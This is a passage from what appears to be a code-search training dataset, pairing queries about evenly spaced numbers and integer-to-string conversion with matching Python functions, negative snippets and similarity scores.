[ "0.65679765", "0.64803994", "0.6422485", "0.64052194", "0.63530135", "0.62748873", "0.62696385", "0.6264165", "0.62514406", "0.6197221", "0.614684", "0.6128096", "0.6093126", "0.60743475", "0.60505", "0.6030288", "0.59912664", "0.597212", "0.5929738", "0.59283173", "0.5926146", "0.59192455", "0.5912632", "0.5909894", "0.58975476", "0.58804953", "0.5865609", "0.5864892", "0.58460045", "0.5828825", "0.58197296", "0.58120394", "0.5801717", "0.571021", "0.5708059", "0.57010025", "0.57009834", "0.56851935", "0.5684159", "0.56653714", "0.5659815", "0.5635104", "0.5633026", "0.5630035", "0.56179696", "0.5593868", "0.5583261", "0.55799663", "0.55732894", "0.55609983", "0.5559755", "0.5547818", "0.554201", "0.55354613", "0.55341744", "0.553211", "0.5528549", "0.55207443", "0.5519006", "0.55133754", "0.55088747", "0.55081207", "0.55047774", "0.54952365", "0.5471753", "0.54712695", "0.54690677", "0.54647857", "0.54615945", "0.5455893", "0.5455893", "0.5438264", "0.54264176", "0.5422898", "0.5418789", "0.5418691", "0.5417632", "0.540907", "0.54072237", "0.5404963", "0.54015595", "0.5401313", "0.5399047", "0.53912765", "0.5382225", "0.5377518", "0.5372248", "0.5363176", "0.5359742", "0.53587353", "0.5355024", "0.53544706", "0.5341583", "0.5341583", "0.532746", "0.5326314", "0.53252864", "0.53149515", "0.5308651", "0.52976984", "0.5290231" ]
0.0
-1
Return a sequence of n evenly spaced numbers from a to b.
def evenly_spaced(self, a: Real, b: Real, n: int) -> Iter: return Iter(_evenly_spaced(a, b, n))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def split_by_n( seq, n ):\n while seq:\n yield seq[:n]\n seq = seq[n:]", "def split_by_n(seq, n):\n while seq:\n yield seq[:n]\n seq = seq[n:]", "def genslices(n):\n return product(range(-n, n+1), range(-n, n+1), range(-n, n+1))", "def genslices(n):\n return product(range(-n, n + 1), range(-n, n + 1), range(-n, n + 1))", "def evenly_spaced_BDs_OLD(BDs, n):\n BDs = BDs.iloc[:,0].tolist()\n BD_min = min(BDs)\n BD_max = max(BDs)\n return np.linspace(BD_min, BD_max, n)", "def seq_ints(n, start=0, step=1):\n return list(range(start, start + n*abs(step), step))", "def partitions(n):\n for a in range(2,n//2+1):\n yield a, n-a", "def binaire(x,n):\n a,q = [],0\n \n for i in range(n):\n q = x%2\n x //=2\n a = [q] + a\n \n return(a)", "def calcSpacings(self, n):\n\n first = next = (n) / float(n + 1)\n for i in range(n):\n yield (next, 1 - next)\n next = first - (1 - next)", "def groups_of(seq, n):\n for i in range(0, len(seq), n):\n yield seq[i : (i + n)]", "def takespread(sequence, num):\n length = float(len(sequence))\n for i in range(num):\n yield sequence[int(np.ceil(i * length / num))]", "def split(a, n):\n k, m = divmod(len(a), n)\n ret = [a[i*k+min(i, m):(i+1)*k+min(i+1, m)] for i in range(n)]\n return ret", "def takespread(sequence, num):\n length = float(len(sequence))\n for i in range(num):\n yield sequence[int(ceil(i * length / num))]", "def genslices(n):\n def range_with_none():\n yield None\n yield from range(-n, n+1)\n\n for t in product(range_with_none(), range_with_none(), range_with_none()):\n s = slice(*t)\n if s.step != 0:\n yield s", "def splitevery(s, n):\n\treturn [s[x:x+n] for x in range(0,len(s), n)]", "def farey(n):\n a, b, c, d = 0, 1, 1, n\n #yield a, b\n while (c <= n):\n k = (n + b) // d\n a, b, c, d = c, d, (k*c-a), (k*d-b)\n yield a, b", "def even_split(a, n):\n n = min(n, len(a)) # if less elements in array than chunks to output, change chunks to array length\n k, m = divmod(len(a), n)\n return (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n))", "def shingle(iterable, n):\n num_shingles = max(1, len(iterable) - n + 1)\n return [iterable[i:i + n] for i in range(num_shingles)]", "def split(a, n):\n n = min(n, len(a))\n k, m = divmod(len(a), n)\n return [a[i * k + min(i, m) : (i + 1) * k + min(i + 1, m)] for i in range(n)]", "def sum_series(n, a=0, b=1):\n\tseq = []\n\tnth_term = 0\n\t\n\tfor i in range(0,n+1):\n\t\tif i == 0:\n\t\t\tseq.append(a)\n\t\tif i == 1:\n\t\t\tseq.append(b)\n\t\tif i > 1:\n\t\t\tnth_term = seq[-1] + seq[-2]\n\t\t\tseq.append(nth_term)\n\t\n\tprint(seq)\n\tprint(seq[n])\n\treturn(seq[n])", "def take(n, seq):\n seq = iter(seq)\n result = []\n try:\n for i in range(n):\n result.append(next(seq))\n except StopIteration:\n pass\n return result", "def split_range(r, n):\n \n step = int(r / n)\n segments = []\n for i in range(n):\n new_segment = [step * i, step * (i + 1)]\n segments.append(new_segment)\n # correct the gap in the missing index due to the truncated step\n segments[-1][-1] = r\n return segments", "def split_into_n(s, n):\n return [s[k:k + n] for k in range(0, len(s), n)]", "def pairs_upto(n):\n return ((a, b)\n for a in range(1, n)\n for b in range(1, n)\n if a <= b)", "def batches(l, n):\n for i in range(0, l, n):\n yield range(i,min(l,i+n))", "def repeat(seq, n):\n for e in seq:\n for _ in range(n):\n yield e", "def randomSeq(n, a, b):\n \n return [\n Complex(a + np.random.random()*(b-a), a + np.random.random()*(b-a))\n for _ in range(n)\n ]", "def iter_n(sequence: Sequence[T], n: int) -> List[T]:\n\t\n\tfor i in range(len(sequence) - (n-1)):\n\t\tyield sequence[i:i+n]", "def seq(n,x=0, y=1):\r\n if n==1:\r\n return x\r\n elif n==2:\r\n return y\r\n else:\r\n return seq(n-1,x,y)+seq(n-2,x,y)", "def plus_table(n):\n return [[(i + j) % n for i in range(n)] for j in range(n)]", "def chunk_it(seq, n):\n\n avg = len(seq) / float(n)\n out = []\n last = 0.0\n while last < len(seq):\n out.append(seq[int(last):int(last + avg)])\n last += avg\n return out", "def a2p(a, N):\n return N + 2 + (a % N) + (a // N) * (N + 1)", "def random_number_generator(a: int, b: int) -> Iterator[int]:\n numbers = [val for val in range(a, b)]\n\n while numbers:\n yield numbers.pop(random.randint(0, len(numbers) - 1))", "def takeNGenerator(seq, n):\n\tindex = 0\n\twhile index + n <= len(seq):\n\t\tyield seq[index:index + n]\n\t\tindex = index + 1", "def evenchunks(l, n):\n if type(l) <> list:\n l = list(l)\n \n import math\n n = int(math.floor(len(l)/float(n))) + 10\n print len(l)\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in xrange(0, len(l), n):\n yield l[i:i+n]", "def linspace(start, stop, n, istart=True, istop=True):\r\n n = n-1\r\n arr = [start + ((stop-start)/n) * i for i in range(n+1)]\r\n return arr", "def iterslices(iterable, n, pad_last=False, pad_value=None):\n current = []\n for a in iterable:\n current.append(a)\n if len(current) == n:\n yield current\n current = []\n if current:\n if pad_last:\n current += [pad_value] * (n-len(current))\n yield current", "def farey(n, a=None, b=None, c=None, d=None):\n pairs = []\n if any(i is None for i in (a, b, c, d)):\n a, b, c, d = 1, n, 1, n-1\n pairs.append((a, b))\n while c <= n:\n k = int((n + b) / d)\n a, b, c, d = c, d, (k*c-a), (k*d-b)\n pairs.append((a, b))\n return pairs", "def just2(n, seq):\n for inner_seq in seq:\n yield tuple(just(n, inner_seq))", "def chunks(alist, n):\n for i in range(0, len(alist), n):\n yield alist[i:i + n]", "def islice(n, m):\n npiece = int(math.ceil(1.0*n/m))\n for i in range(npiece):\n if (i+1)*m > n:\n yield i, i*m, n\n else:\n yield i, i*m, (i+1)*m", "def window(seq, n=2):\n it = iter(seq)\n result = tuple(islice(it, n))\n if len(result) == n:\n yield result\n for elem in it:\n result = result[1:] + (elem,)\n yield result", "def window(seq, n=2):\n it = iter(seq)\n result = tuple(islice(it, n))\n if len(result) == n:\n yield result\n for elem in it:\n result = result[1:] + (elem,)\n yield result", "def makePermutations(n):\n\thalf = n // 2\n\tfull = half * 2\n\tswap = np.random.rand(half) > 0.5\n\tpx = np.arange(n)\n\tpx[:full:2] += swap\n\tpx[1:full:2] -= swap\n\treturn px", "def calculate_ranges(a, b):\n try:\n ranges = list(range(0, a, a//b))\n if ranges[-1] != a:\n ranges.append(a)\n return ranges\n except ValueError:\n return [0, a]", "def fibonacci_series_to(n):\r\n l = [0, 1] \r\n for i in range(n - 1):\r\n l = [*l, l[-1] + l[-2]]\r\n return l[:n]", "def chunks(l, n):\n for i in range(0, n):\n yield l[i::n]", "def chunks(l, n):\r\n for i in xrange(0, len(l), n):\r\n yield l[i+1:i+n+1:2]", "def Split(self, k):\n n = len(self)\n start = range(0, n, ceil(n / k))\n end = list(start[1:]) + [n]\n return [range(first, last) for first, last in zip(start, end)]", "def window(seq, n):\n seq_it = iter(seq)\n result = tuple(it.islice(seq_it, n))\n if len(result) == n:\n yield result \n for elem in seq_it:\n result = result[1:] + (elem,)\n yield result", "def makespread(sequence, num):\n length = float(len(sequence))\n seq = np.array(sequence)\n return seq[np.ceil(np.arange(num) * length / num).astype(int)]", "def chunks(seq, n):\n assert len(seq) > n\n avg = len(seq) / float(n)\n out = []\n last = 0\n while round(last) < len(seq):\n out.append(seq[round(last):round(last + avg)])\n last += avg\n return out", "def part_2():\n return itertools.permutations(range(5, 10))", "def evenquerychunks(l, n):\n\n l = list(l)\n \n import math\n n = int(math.floor(len(l)/float(n))) + 1\n print len(l)\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n results = []\n for i in xrange(0, len(l), n):\n results.append( l[i:i+n])\n \n return results", "def just(n, seq):\n it = iter(seq)\n for _ in range(n - 1):\n yield next(it, None)\n yield tuple(it)", "def chunks(l, n):\n lists = []\n for i in range(n):\n list1 = np.arange( i*l/n+1 , (i+1)*l/n+1 )\n lists.append(list1)\n return lists", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i+n]", "def chunks(l, n):\n for i in xrange(0, len(l), n):\n yield l[i:i+n]", "def srange(x1, xDoors, spaces):\n for a in xrange(x1, x1 + xDoors):\n yield a\n for a in xrange(x1 + xDoors + spaces, x1 + spaces + xDoors * 2):\n yield a", "def sliding_window(seq, n=DEFAULT_WINDOW_WIDTH):\n it = iter(seq)\n result = tuple(islice(it, n))\n if len(result) == n:\n yield result \n for elem in it:\n result = result[1:] + (elem,)\n yield result", "def chunk(iterable, n):\n iterable = [e for e in iterable]\n avg_length = int(math.ceil(len(iterable) / n))\n return [iterable[i * avg_length:(i + 1) * avg_length] for i in range(n)]", "def numbers(num):\n r = []\n for i in range(num):\n d = len(r)\n r = [1 if i == 0 or i == d else r[i-1]+r[i] for i in range(d+1)]\n yield r", "def distribute_list(a):\n if isinstance(a, int):\n a = range(a)\n out_idxs = []\n ratio = (0.5*(1 + np.sqrt(5)) - 1)*len(a) # Golden fraction\n idx = -ratio\n while len(out_idxs) < len(a):\n idx += ratio\n idx %= len(a)\n idx_int = int(idx)\n while idx_int in out_idxs:\n idx_int += 1\n idx_int %= len(a)\n out_idxs.append(idx_int)\n out = copy.copy(a)\n try:\n for idx_out, idx_a in enumerate(out_idxs):\n out[idx_out] = a[idx_a]\n except TypeError:\n out = list(copy.copy(a))\n for idx_out, idx_a in enumerate(out_idxs):\n out[idx_out] = a[idx_a]\n\n return out", "def split(a, N):\n\n integ = int(len(a) / N)\n remain = int(len(a) % N)\n\n splitted = [a[i * integ + min(i, remain):(i + 1) * integ +\n min(i + 1, remain)] for i in range(N)]\n\n return splitted", "def pair_stream(n):\n n_str = str(n)\n if len(n_str) % 2 != 0:\n n_str = '0' + n_str\n pairs = textwrap.wrap(n_str, 2)\n digit_pairs = [int(p) for p in pairs]\n return itertools.chain(digit_pairs, itertools.repeat(0))", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(l, n):\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]", "def chunks(seq: Sequence[T], n: int) -> Iterator[Sequence[T]]:\n for i in range(0, len(seq), n):\n yield seq[i:i + n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\r\n for i in xrange(0, len(l), n):\r\n yield l[i:i+n]", "def chunks(l, n):\n n = int(n)\n for i in xrange(0, len(l), n):\n yield l[i:i+n]", "def chunks(arr, n):\n for i in range(0, len(arr), n):\n yield arr[i:i + n]", "def chunks(l, n):\n for i in xrange(0, len(l), n):\n yield l[i:i+n]", "def compute_sequence(starting_numbers: List[int], n_elems: int) -> int:\n elems = list(reversed(starting_numbers))\n\n for _ in range(len(starting_numbers), n_elems):\n try:\n idx_before = elems.index(elems[0], 1)\n except ValueError:\n elems = [0] + elems\n else:\n elems = [idx_before] + elems\n\n return elems[0]", "def triple_step_simplified(n):\n\ta = 0\n\tb = 0\n\tc = 1\n\tfor i in range(n):\n\t\ttemp = a + b + c\n\t\ta, b, c = b, c, temp\n\treturn temp", "def make_b_array(n):\n array = np.linspace(-3, 3, n)\n for i, x in enumerate(array[1:-1], start=1):\n if abs(x) < 1:\n array[i] = 2\n else:\n array[i] = 0\n array[0] = 0\n array[n-1] = 0\n\n return array", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in xrange(0, len(l), n):\n yield l[i:i + n]", "def n_split(text1: Iterable, n: int) -> list:\n\n return [text1[k:k + n] for k in range(0, len(text1), n)]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i: i+n]", "def chunks(l, n):\n for i in xrange(0, len(l), n):\n yield l[i:i+n]", "def take(n, seq):\n return itertools.islice(seq, n)", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]", "def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i:i + n]" ]
[ "0.67545396", "0.67385876", "0.6609418", "0.6586301", "0.6527549", "0.6490447", "0.64674157", "0.6464234", "0.64498013", "0.6438853", "0.6431555", "0.64294153", "0.6413279", "0.63846004", "0.63330746", "0.63312566", "0.6319206", "0.6290663", "0.6289663", "0.62633723", "0.62446594", "0.62296426", "0.6226975", "0.62158066", "0.62067735", "0.6196273", "0.61873305", "0.61803776", "0.6178925", "0.6147991", "0.6137082", "0.61194134", "0.6093666", "0.60886574", "0.6073825", "0.6063465", "0.60597724", "0.6054333", "0.6047532", "0.60453856", "0.6037573", "0.6010199", "0.6010199", "0.6001028", "0.59924465", "0.5986941", "0.5979974", "0.59763634", "0.5971845", "0.5965501", "0.5947776", "0.5947559", "0.5939785", "0.592717", "0.592068", "0.58920205", "0.586579", "0.5865053", "0.58608514", "0.58592176", "0.5857192", "0.5857014", "0.58545965", "0.58545464", "0.585278", "0.5849679", "0.5849679", "0.5849679", "0.5849679", "0.5849679", "0.583961", "0.58365214", "0.58314204", "0.58295274", "0.5827467", "0.58254987", "0.582492", "0.5824357", "0.58201087", "0.58127725", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.5808044", "0.58075196", "0.580334", "0.58017546", "0.58003306", "0.5800173", "0.57992315", "0.57992315", "0.57992315", "0.5790815" ]
0.7720257
0
Convert int to string without using builtin str()
def int_to_string(num): if num < 0: num, is_neg = -num, True else: is_neg = False s = [] while num > 0: s.append(chr(ord('0') + num%10)) num //= 10 return ('-' if is_neg else '') + ''.join(reversed(s))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _int2str(num):\n if num<10:\n return '00%s'%str(num)\n elif 10<=num<100:\n return '0%s'%str(num)\n else:\n return '%s'%str(num)", "def _int_to_string(v):\n \n if not isinstance(v,int):\n raise InstrumentParameterException('Value %s is not an int.' % str(v))\n else:\n return '%i' % v", "def intToString(*args):\n return _libsbml.SBO_intToString(*args)", "def to_str(variable):\n try:\n int(variable)\n return str(variable)\n except ValueError:\n return variable", "def ints_to_string(iterable):\n return ''.join([chr(i) for i in iterable])", "def num2str(num):\n require_type(is_number(num), 'parameter of number->string must be a number')\n return tostr(num)", "def base2str(self, int_number):\r\n return self.format_base % (float(int_number) / self.mult_base)", "def SBO_intToString(*args):\n return _libsbml.SBO_intToString(*args)", "def process_int(integer: int) -> str:\n\n return str(integer) if integer else Presenter.DEFAULT", "def validate_int_to_str(x):\n\n if isinstance(x, int):\n return str(x)\n if isinstance(x, str):\n return str(int(x))\n\n raise TypeError(f\"Value {x} of type {type(x)} must be either int or str\")", "def __rank_from_int_to_str(rank: int) -> str:\n return str(rank + 1)", "def __int__(self):\n return int(str(self),2)", "def int2dec(n: int) -> str:", "def serialize_number(n):\n return str(n)", "def _num2str(self, num):\n q, mod = divmod(num, 10)\n suffix = \"th\" if q == 1 else self.SUFFIX_DICT[mod]\n return f\"{num}{suffix}\"", "def convert_int_to_str(df):", "def transforme(n):\n if n<10 :\n return '0'+str(n)\n else :\n return str(n)", "def issnint2str(issn_int):\n if type(issn_int) is not int:\n raise TypeError(\"issn_int is not int\")\n issn_ = \"{num:07d}\".format(num=issn_int)\n check = map(lambda x: int(x), issn_)\n res = 0\n for pp in zip(check, range(8, 1, -1)):\n res += pp[0] * pp[1]\n\n rem = (11 - res) % 11\n rem = \"X\" if rem == 10 else rem\n issn_str = \"{0}-{1}{2}\".format(issn_[:4], issn_[4:], rem)\n return issn_str", "def int2str(value_int, currency):\r\n if currency in \"BTC LTC NMC\":\r\n return (\"%16.8f\" % (value_int / 100000000.0))\r\n elif currency in \"JPY SEK\":\r\n return (\"%12.3f\" % (value_int / 1000.0))\r\n else:\r\n return (\"%12.5f\" % (value_int / 100000.0))", "def quote2str(self, int_number):\r\n return self.format_quote % (float(int_number) / self.mult_quote)", "def convertInt(s):\n try:\n int(s)\n return \"INT\"\n except:\n return s", "def to_str(n: float) -> str:\n return str(n)", "def _format(self, id_num: int) -> typing.Union[int, str]:\n return id_num", "def int_to_str(number):\n rb = RuleBasedNumberFormat(URBNFRuleSetTag.SPELLOUT, Locale('pl_PL'))\n verbalized = rb.format(int(number))\n return verbalized", "def format_int(self, data):\n return u'%d' % data", "def get_simple_digit_str(a_float_int):\r\n int_value = int(a_float_int)\r\n if int_value == a_float_int:\r\n return str(int_value)\r\n return \"%.3f\" % a_float_int", "def convert(num):\r\n if len(str(num))==1:\r\n return \"000%i\"%num\r\n elif len(str(num)) == 2:\r\n return \"00%i\"%num\r\n elif len(str(num)) == 3:\r\n return \"0%i\"%num\r\n elif len(str(num)) == 4:\r\n return \"%i\"%num", "def convert_to_str(value):\n\tif value is None:\n\t\treturn '-'\n\treturn str(value)", "def internal_id_to_display_id(i_id: int) -> str:\n i_id = str(i_id).zfill(9)\n return ''.join(i_id[x - 1] for x in [1, 5, 9, 6, 3, 8, 2, 4, 7])", "def intRender(self, number):\n\n data = unicode(number)\n bites = list()\n\n while data:\n bites.append(data[-3:])\n data = data[:-3]\n\n return \" \".join(reversed(bites))", "def __str__(self):\n if self.is_int():\n return str(self._num)\n else:\n return \"{0:d} / {1:d}\".format(self._num, self._den)", "def decint2binstr(n):\n if n < 0:\n return '-' + decint2binstr(-n)\n s = ''\n while n != 0:\n s = str(n % 2) + s\n n >>= 1\n return s or '0'", "def int2hex(n: int) -> str:", "def int2text(integer):\n # Numbers 1-99 are handled by simply looking up words in the special_case\n # dictionary.\n if integer < 100:\n return digit2text(integer)\n\n elif integer < 1000:\n # If exactly some hundred, then just return the word for the hundred's\n # place and the word 'hundred'\n if integer%100 == 0:\n return digit2text(integer/100)+'hundred'\n # Otherwise return the word for the hundred's place, the word\n # 'hundredand' and do some composition to make the rest of the words.\n else:\n return digit2text(integer/100)+'hundredand'+\\\n digit2text(integer%100)\n # Special case for 1000.\n elif integer == 1000:\n return \"onethousand\"", "def numbers_to_string(nums):\n return \"\".join(chr(n + ord(\"a\")) for n in nums)", "def int_to_hexstr(data: int) -> str:\n return \"%0.2X\" % data", "def _encode_int(source: int) -> bytes:\n return b\"i\" + str(source).encode(\"ascii\") + b\"e\"", "def shot_to_str(shot: int) -> str:\n return f\"{shot+1:04d}\"", "def Int(val):\n try:\n return int(val)\n except ValueError:\n return ''", "def format_num(num):\n if num is None:\n return num\n if (num < 10):\n return '0' + str(num)\n return str(num)", "def getString(self, int: int, int2: int) -> str:\n ...", "def convert_ipv4_to_str(n_int):\n return \".\".join([str(n_int >> n & 0xFF) for n in [24, 16, 8, 0]])", "def to_string(self, increment):\n\n raise Exception(\"Not implemented!\"+self.__class__)", "def number_as_string(x):\n \n numnames = {1 : \"one\", 2 : \"two\", 3 : \"three\", 4 : \"four\", 5 : \"five\", 6 : \"six\", 7 : \"seven\", 8 : \"eight\", 9 : \"nine\",\n 10 : \"ten\", 11 : \"eleven\", 12 : \"twelve\", 13 : \"thirteen\", 14 : \"fourteen\", 15 : \"fifteen\", 16 : \"sixteen\",\n 17 : \"seventeen\", 18 : \"eighteen\", 19 : \"nineteen\", 20 : \"twenty\", 30 : \"thirty\", 40 : \"forty\", 50 : \"fifty\", \n 60 : \"sixty\", 70 : \"seventy\", 80 : \"eighty\", 90 : \"ninety\"}\n \n numparts = []\n needAnd = (x > 100) and (x % 100)\n if x >= 1000:\n numparts.append(numnames[x/1000])\n numparts.append(\"thousand\")\n x %= 1000\n \n if x >= 100:\n numparts.append(numnames[x/100])\n numparts.append(\"hundred\")\n x %= 100\n \n if needAnd:\n numparts.append(\"and\")\n \n if 11 <= x <= 19:\n numparts.append(numnames[x])\n else:\n if x >= 10:\n numparts.append(numnames[(x/10)*10])\n x %= 10\n\n if x > 0:\n numparts.append(numnames[x])\n \n return \" \".join(numparts)", "def gnss2str(gnss_id: int) -> str:\r\n\r\n try:\r\n return GNSSLIST[gnss_id]\r\n except KeyError:\r\n return str(gnss_id)", "def int_2_ip_str(ip_int):\n return socket.inet_ntoa(struct.pack(\"!I\", ip_int))", "def ten(number: int) -> str:\n\n string_form = str(number)\n return string_form if number >= 0 else \"0\" + string_form", "def int_to_python(self, value):\r\n return int(value)", "def ids_to_string(idlist):\r\n if len(idlist) == 1:\r\n return \"{:d}\".format(idlist[0])\r\n else:\r\n return \"-\".join([\"{:d}\".format(id) for id in idlist])", "def to_str(x) -> str:\n return str(x) if x else ''", "def day_str(day):\n return str(day) if day >= 10 else '0' + str(day)", "def day_str(day):\n return str(day) if day >= 10 else '0' + str(day)", "def day_str(day):\n return str(day) if day >= 10 else '0' + str(day)", "def CopyToString(self):\n if self.sequence_number is None:\n return None\n\n return '{0:d}'.format(self.sequence_number)", "def transform(s):\n return 'digit ' + str(s)", "def int_to_string(ints, inv_vocab):\n \n l = [inv_vocab[i] for i in ints]\n return l", "def str(x):\n return str(x)[:200]", "def transform(s):\r\n return 'digit ' + str(s)", "def numToStrLabel(self, value):\n zero_count = 3 - len(str(value))\n return zero_count * \"0\" + str(value)", "def makeinputstring(variabel):\r\n if type(variabel) == int:\r\n return str(variabel)\r\n elif type(variabel) == float:\r\n return str(int(float(variabel)))\r\n else:\r\n return str(variabel)", "def int_to_string(ints, inv_vocab):\n\n l = [inv_vocab[i] for i in ints]\n return l", "def __ip2intstr(self, address):\n return str(struct.unpack('!I', address)[0])", "def digitstr(n):\n return ''.join(choice(digits) for _ in range(n))", "def int_to_byte_str(num, size):\n return num.to_bytes(size, byteorder = \"big\")", "def __coordinate_system_to_str__(value_int):\n if value_int == GeometryTopologyData.IJK: return \"IJK\"\n elif value_int == GeometryTopologyData.RAS: return \"RAS\"\n elif value_int == GeometryTopologyData.LPS: return \"LPS\"\n return \"UNKNOWN\"", "def to_str(self) -> str:", "def int_with_commas(number):\n try:\n number = int(number)\n if number < 0:\n return '-' + int_with_commas(-number)\n result = ''\n while number >= 1000:\n number, number2 = divmod(number, 1000)\n result = \",%03d%s\" % (number2, result)\n return \"%d%s\" % (number, result)\n except Exception:\n return \"\"", "def test_int_to_str(self):\n @converters.wrap\n def inner_test(param: str):\n \"\"\"Make sure the parameter was converted correctly.\"\"\"\n self.assertEqual(param, '256')\n inner_test(param=256)", "def InfIntToStr(s, i, n):\n if i == len(s):\n return \"\"\n elif i == 0:\n return str(int(s[i])) + InfIntToStr(s, i + 1, n)\n else:\n return str(int(s[i])).zfill(n) + InfIntToStr(s, i + 1, n)", "def int2bin(n: int) -> str:", "def formatInteger(value):\n return locale.format('%d',int(value),1)", "def act_to_str(act: int):\n if act == 0:\n return \"L\"\n elif act == 1:\n return \"D\"\n elif act == 2:\n return \"R\"\n elif act == 3:\n return \"U\"\n else:\n raise ValueError(\"Invalid action value\")", "def int_format(self):\n ...", "def diff_to_str(diff: int) -> str:\n return 'D{}'.format(diff)", "def quantity_to_string(quantity):\n qdict = {\n '*': '0 or more',\n 'zero_or_more': '0 or more',\n '+': '1 or more',\n 'one_or_more': '1 or more',\n '?': '0 or 1',\n 'zero_or_one': '0 or 1'\n }\n if isinstance(quantity, int):\n return str(quantity)\n else:\n return qdict[quantity]", "def encode(self, value: typing.Union[int, str]) -> int:\n return int(value)", "def intToCommaStr(int_ip):\n import sys\n if sys.version_info < (2, 7):\n return str(int_ip)\n else:\n int_ip = int(int_ip)\n return '{:,d}'.format(int_ip)", "def numList2String(l):\n\treturn ''.join(map(chr, l))", "def strIdx(idx):\n if not isinstance(idx, (int, np.integer)):\n raise ValueError(\"Index must be an integer.\")\n\n return str(idx) if idx >= 0 else str(-idx) + u'\\u0305'", "def int_to_hex(num):\n return hex(num)", "def int_array_to_str(result):\n result = [str(i) for i in result]\n return \"\".join(result)", "def e_int(obj):\n if obj == \"\":\n obj = 0\n num = int(obj)\n return\"{:,}\".format(num)", "def encode_int(n):\n return struct.pack(\">I\", n)", "def binaryToString(num):\n result = []\n for _ in range(32):\n num = num * 2\n result.append(int(num))\n num = num - int(num)\n if num == 0:\n break\n else:\n if num != 0:\n return 'ERROR'\n return ''.join(str(x) for x in result)", "def valueToString():", "def str(x) -> String:\n pass", "def cond_int2str(cond_int=0):\n try:\n return {\n 0: '晴',\n 1: '多云',\n 2: '阴',\n 3: '阵雨',\n 4: '雷阵雨',\n 5: '雷阵雨伴有冰雹',\n 6: '雨夹雪',\n 7: '小雨',\n 8: '中雨',\n 9: '大雨',\n 10: '暴雨',\n 11: '大暴雨',\n 12: '特大暴雨',\n 13: '阵雪',\n 14: '小雪',\n 15: '中雪',\n 16: '大雪',\n 17: '暴雪',\n 18: '雾',\n 19: '冻雨',\n 20: '沙尘暴',\n 21: '小到中雨',\n 22: '中到大雨',\n 23: '大到暴雨',\n 24: '暴雨到大暴雨',\n 25: '大暴雨到特大暴雨25',\n 26: '小到中雪',\n 27: '中到大雪',\n 28: '大到暴雪',\n 29: '浮尘',\n 30: '扬沙',\n 31: '强沙尘暴',\n 53: '霾',\n 99: '无'\n }[cond_int]\n except KeyError as e:\n logging.warning(e)\n return \"-\"", "def convert_action_to_string(self, action_number):\n return str(action_number)", "def str_base(num, base=36, numerals=\"0123456789abcdefghijklmnopqrstuvwxyz\"):\n if base < 2 or base > len(numerals):\n raise ValueError(\"`base` must be between 2 and %i\")\n\n if num == 0:\n return '0'\n\n buf = BytesIO()\n\n if num < 0:\n buf.write(\"-\")\n num = -num\n\n while num:\n buf.write(numerals[num % base])\n num //= base\n\n return buf.getvalue()", "def convert_label_num2string(number, num_types):\n dictionary = empty_label_dictionary(num_types)\n all_labels = list(dictionary.keys())\n return all_labels[number]", "def get_binary_string_rep(number: int) -> str:\n binary = bin(number)[2:].zfill(LENGTH)\n return \".\".join(binary[i: i + 8].zfill(8) for i in range(0, len(binary), 8))", "def get_string(self, n):\n pad = self.get_pad(n)\n string = pad + self.c\n return string", "def to_string(self, name, value):\r\n \r\n return str(value)", "def int_to_hex(n):\r\n #return \"0x%X\" % n\r\n return hex(n)", "def format(id, length=5):\n return str(bin(id))[2:] if len(str(int(id))[2:])>4 else (5-len(str(bin(id))[2:]))*\"0\"+str(bin(id))[2:]", "def convert_dec(integer, base):\n digits = '0123456789ABCDEFGHIJKLMNOP'\n s = Stack()\n while integer:\n s.push(digits[integer%base])\n integer //= base\n b = ''\n while not s.is_empty():\n b += str(s.pop())\n return b", "def to_string(value: Any) -> str:\n return StringConverter.to_string_with_default(value, '')", "def quantity_encoder(i: int) -> str:\n return hex(i).rstrip('L')", "def int_to_base(num, base):\n if base<=0: return '0' \n digits = []\n if (num <0):\n \tcur= -num\n else: cur = num\n while(cur>0):\n\t\tdigits.append(str(cur%base))\n\t\tcur/=base\n if (num <0): digits.append('-')\n digits.reverse()\n\n \n \n return ''.join(digits)", "def fmt_int(value):\n if value is None:\n return -999999999999999\n return int(value)" ]
